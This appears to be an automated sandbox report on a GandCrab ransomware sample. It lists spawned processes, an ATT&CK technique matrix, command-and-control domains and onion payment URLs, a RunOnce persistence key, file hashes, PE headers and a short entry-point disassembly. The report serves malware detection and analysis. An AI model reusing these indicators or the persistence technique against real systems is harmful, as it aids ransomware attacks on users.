                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00403A60 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,1_2_00403A60
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00408BC0 cpuid 1_2_00408BC0
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00406D90 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,1_2_00406D90
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Replication Through Removable Media
                    2
                    Native API
                    1
                    Registry Run Keys / Startup Folder
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    Security Software Discovery
                    1
                    Replication Through Removable Media
                    11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium2
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    Data Encrypted for Impact
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    Registry Run Keys / Startup Folder
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory1
                    Virtualization/Sandbox Evasion
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Ingress Tool Transfer
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
                    Process Injection
                    Security Account Manager1
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Software Packing
                    NTDS11
                    Peripheral Device Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer1
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                    Account Discovery
                    SSHKeyloggingData Transfer Size Limits1
                    Proxy
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                    System Network Configuration Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                    System Network Connections Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                    File and Directory Discovery
                    Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture44
                    System Information Discovery
                    Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 694569 Sample: 9gkAKTWOXp.exe Startdate: 01/09/2022 Architecture: WINDOWS Score: 100 57 nomoreransom.bit 2->57 59 gandcrab.bit 2->59 61 3 other IPs or domains 2->61 65 Snort IDS alert for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 5 other signatures 2->71 8 9gkAKTWOXp.exe 1 28 2->8         started        13 vkspii.exe 2->13         started        15 vkspii.exe 2->15         started        signatures3 process4 dnsIp5 63 ipv4bot.whatismyipaddress.com 8->63 40 C:\Users\user\AppData\Roaming\...\vkspii.exe, PE32 8->40 dropped 73 Contains functionality to determine the online IP of the system 8->73 75 May check the online IP address of the machine 8->75 77 Uses nslookup.exe to query domains 8->77 17 nslookup.exe 1 8->17         started        20 nslookup.exe 1 8->20         started        22 nslookup.exe 1 8->22         started        24 19 other processes 8->24 79 Antivirus detection for dropped file 13->79 81 Machine Learning detection for dropped file 13->81 file6 signatures7 process8 dnsIp9 42 dns1.soprodns.ru 17->42 45 nomoreransom.bit 17->45 47 8.8.8.8.in-addr.arpa 17->47 26 conhost.exe 17->26         started        51 3 other IPs or domains 20->51 28 conhost.exe 20->28         started        53 3 other IPs or domains 22->53 30 conhost.exe 22->30         started        49 nomoreransom.bit 24->49 55 57 other IPs or domains 24->55 32 conhost.exe 24->32         started        34 conhost.exe 24->34         started        36 conhost.exe 24->36         started        38 16 other processes 24->38 signatures10 83 May check the online IP address of the machine 42->83 process11

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    9gkAKTWOXp.exe81%VirustotalBrowse
                    9gkAKTWOXp.exe73%MetadefenderBrowse
                    9gkAKTWOXp.exe100%ReversingLabsWin32.Ransomware.GandCrab
                    9gkAKTWOXp.exe100%AviraTR/Crypt.XPACK.Gen3
                    9gkAKTWOXp.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe100%AviraTR/Crypt.XPACK.Gen3
                    C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLinkDownload
                    13.0.vkspii.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
                    1.2.9gkAKTWOXp.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
                    13.2.vkspii.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
                    21.2.vkspii.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
                    1.0.9gkAKTWOXp.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
                    21.0.vkspii.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
                    SourceDetectionScannerLabelLink
                    emsisoft.bit0%VirustotalBrowse
                    nomoreransom.bit1%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de100%Avira URL Cloudmalware
                    http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de100%Avira URL Cloudphishing
                    http://gdcbghvjyqy7jclk.onion/e644d32fec6144de0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    emsisoft.bit
                    unknown
                    unknowntrueunknown
                    ipv4bot.whatismyipaddress.com
                    unknown
                    unknownfalse
                      high
                      nomoreransom.bit
                      unknown
                      unknowntrueunknown
                      gandcrab.bit
                      unknown
                      unknowntrue
                        unknown
                        dns1.soprodns.ru
                        unknown
                        unknowntrue
                          unknown
                          8.8.8.8.in-addr.arpa
                          unknown
                          unknownfalse
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.torproject.org/9gkAKTWOXp.exe, vkspii.exe.1.drfalse
                              high
                              http://gdcbghvjyqy7jclk.onion.guide/e644d32fec6144de9gkAKTWOXp.exe, vkspii.exe.1.drfalse
                                high
                                http://gdcbghvjyqy7jclk.onion.plus/e644d32fec6144de9gkAKTWOXp.exe, vkspii.exe.1.drfalse
                                  high
                                  http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de9gkAKTWOXp.exe, vkspii.exe.1.drtrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de9gkAKTWOXp.exe, vkspii.exe.1.drtrue
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://gdcbghvjyqy7jclk.onion/e644d32fec6144de9gkAKTWOXp.exe, vkspii.exe.1.drtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gdcbghvjyqy7jclk.onion.rip/e644d32fec6144de9gkAKTWOXp.exe, vkspii.exe.1.drfalse
                                    high
                                    No contacted IP infos
                                    Joe Sandbox Version:35.0.0 Citrine
                                    Analysis ID:694569
                                    Start date and time:2022-09-01 00:00:17 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 5s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:9gkAKTWOXp.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:62
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.rans.troj.evad.winEXE@127/2@529/0
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 100% (good quality ratio 96.9%)
                                    • Quality average: 84.4%
                                    • Quality standard deviation: 23.4%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 44
                                    • Number of non-executed functions: 122
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.82.228.9, 20.82.154.241
                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, neus2c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neus1c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    00:01:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlal "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
                                    00:01:22API Interceptor80x Sleep call for process: 9gkAKTWOXp.exe modified
                                    00:01:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlal "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\9gkAKTWOXp.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2218
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:F97F9E17EAFDD0105A4E11BAFDE04B40
                                    SHA1:BA06A7ABE986A61B71889B80A6F9B02B22D40667
                                    SHA-256:4783424121E6C2F870DC931B374D20C62C764EDDC5769D2F536609ADC1226ABB
                                    SHA-512:778C4AAB55F6F0FE44DBC9A97F53B59EC8ED2E35901F77AFEBAEA57C738AD301412760709AB909B51335DDD7676CD8F8C1410C5751F2EF5CC74282BCD6C5F50E
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\9gkAKTWOXp.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):75264
                                    Entropy (8bit):4.804275425971981
                                    Encrypted:false
                                    SSDEEP:1536:ugSeGDjtQhnwmmB0yjMqqUM2mr3IdE8mne0Avu5r++yy7CA7GcIaapavdv:uMSjOnrmBbMqqMmr3IdE8we0Avu5r++N
                                    MD5:551DA842D854798E9D42602EB420BD96
                                    SHA1:B44E2B41F17EC56135BE9ED3F545025078E912EC
                                    SHA-256:F54A4A6120B5236D4621F4D38F496E2025A352D19A191799DB53F38E60C9C7EA
                                    SHA-512:877A04DC6730634E59C9395291CE80AD4F049CA1C24AE7D064129AC5DE5F65A67A2F1FABA6486353CC2676D838CEB7C4C6018456A8B7AF7F2BB703FD6865489C
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: Florian Roth
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: Joe Security
                                    • Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: kevoreilly
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This @i...5m cannot be run in DOS mode....$.......AU@..4...4...4..Ce...4..Ce...4...f...4...4...4...L...4...4/.4...f...4...f...4...f...4..Rich.4..................PE..L...].vZ.............................J............@..........................`............@.................................p........@.......................P.......................................................................................text............................... ..`.rdata..............................@....data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):4.804368489925485
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:9gkAKTWOXp.exe
                                    File size:75264
                                    MD5:74e135b472b7496b371ce3ba3acfeea8
                                    SHA1:b64fdd870ff28291b8347317a838a5fb210a6056
                                    SHA256:d093322a612760cb00ae6fb4c453851ba26f59f2e6a0920b5871a28bbddf9355
                                    SHA512:c7c3fc7db77b5d450b857917b4157c2e1d2dcc41e18e248e50139711a04ee9893be26679e969a769113349ef9122387333ec7fe57d4d84dc541a4c9f9e25300b
                                    SSDEEP:1536:kgSeGDjtQhnwmmB0yjMqqUM2mr3IdE8mne0Avu5r++yy7CA7GcIaapavdv:kMSjOnrmBbMqqMmr3IdE8we0Avu5r++N
                                    TLSH:787317053AE18133FAF2F9B265B869E1587B7E541B287ADF00E8043E19275E25D30B4F
                                    File Content Preview:MZ......................@...............................................!..L.!This ..^.:_m cannot be run in DOS mode....$.......AU@..4...4...4..Ce...4..Ce...4...f...4...4...4...L...4...4/..4...f...4...f...4...f...4..Rich.4..................PE..L...].vZ...
                                    Icon Hash:00828e8e8686b000
                                    Entrypoint:0x404af0
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x5A76065D [Sat Feb 3 18:58:37 2018 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:40306b615af659fc1f93cfb121cc38d9
                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    call 00007F7110ADC4ADh
                                    push 00000000h
                                    call dword ptr [00409168h]
                                    pop ebp
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 5Ch
                                    push esi
                                    push 00000044h
                                    lea eax, dword ptr [ebp-58h]
                                    xorps xmm0, xmm0
                                    push 00000000h
                                    push eax
                                    mov esi, ecx
                                    movdqu dqword ptr [ebp-10h], xmm0
                                    call 00007F7110AE0707h
                                    mov eax, dword ptr [00412B0Ch]
                                    add esp, 0Ch
                                    mov dword ptr [ebp-18h], eax
                                    mov dword ptr [ebp-1Ch], eax
                                    mov eax, dword ptr [00412B08h]
                                    or dword ptr [ebp-2Ch], 00000101h
                                    mov dword ptr [ebp-20h], eax
                                    xor eax, eax
                                    mov word ptr [ebp-28h], ax
                                    lea eax, dword ptr [ebp-10h]
                                    push eax
                                    lea eax, dword ptr [ebp-58h]
                                    mov dword ptr [ebp-58h], 00000044h
                                    push eax
                                    push 00000000h
                                    push 00000000h
                                    push 00000000h
                                    push 00000001h
                                    push 00000000h
                                    push 00000000h
                                    push esi
                                    push 00000000h
                                    call dword ptr [00409164h]
                                    test eax, eax
                                    jne 00007F7110ADC70Dh
                                    call dword ptr [00409064h]
                                    pop esi
                                    mov esp, ebp
                                    pop ebp
                                    ret
                                    push dword ptr [ebp-10h]
                                    mov esi, dword ptr [0040910Ch]
                                    call esi
                                    push dword ptr [ebp-0Ch]
                                    call esi
                                    pop esi
                                    mov esp, ebp
                                    pop ebp
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 10h
                                    movq xmm0, qword ptr [0040FF2Ch]
                                    mov al, byte ptr [0040FF34h]
                                    push ebx
                                    mov ebx, dword ptr [ebp+08h]
                                    Programming Language:
                                    • [ C ] VS2013 build 21005
                                    • [IMP] VS2008 SP1 build 30729
                                    • [RES] VS2013 build 21005
                                    • [LNK] VS2013 build 21005
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x109700xb4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x1e0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x150000xab0.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x80000x8000False0.439727783203125data5.762192122939682IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x90000x90000x8600False0.26437150186567165data3.71703192533741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .data0x120000x10000xc00False0.2613932291666667data3.15531156836296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .CRT0x130000x10000x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x140000x10000x200False0.52734375data4.710061382693063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x150000x10000xc00False0.008138020833333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountry
                                    RT_MANIFEST0x140600x17dXML 1.0 document textEnglishUnited States
                                    DLLImport
                                    KERNEL32.dllSetFilePointer, GetFileAttributesW, ReadFile, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, Process32FirstW, GetTempPathW, GetProcAddress, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
